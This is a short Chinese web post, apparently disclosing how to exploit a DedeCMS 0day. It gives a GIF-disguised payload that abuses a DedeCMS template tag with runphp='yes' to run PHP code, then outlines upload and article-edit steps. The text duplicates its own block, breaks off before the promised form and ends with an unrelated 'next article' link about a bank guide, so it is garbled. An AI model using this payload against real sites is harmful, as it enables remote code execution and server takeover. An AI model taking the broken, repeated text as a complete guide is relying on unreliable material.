此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。
Gif89a{dede:field name='toby57' runphp='yes'} phpinfo(); {/dede:field} 保存为1.gif
构造如上表单,上传后图片保存为https://www.77cn.com.cn/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。
Gif89a{dede:field name='toby57' runphp='yes'} phpinfo(); {/dede:field} 保存为1.gif
构造如上表单,上传后图片保存为https://www.77cn.com.cn/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
下一篇:中国邮政储蓄银行理财类业务指引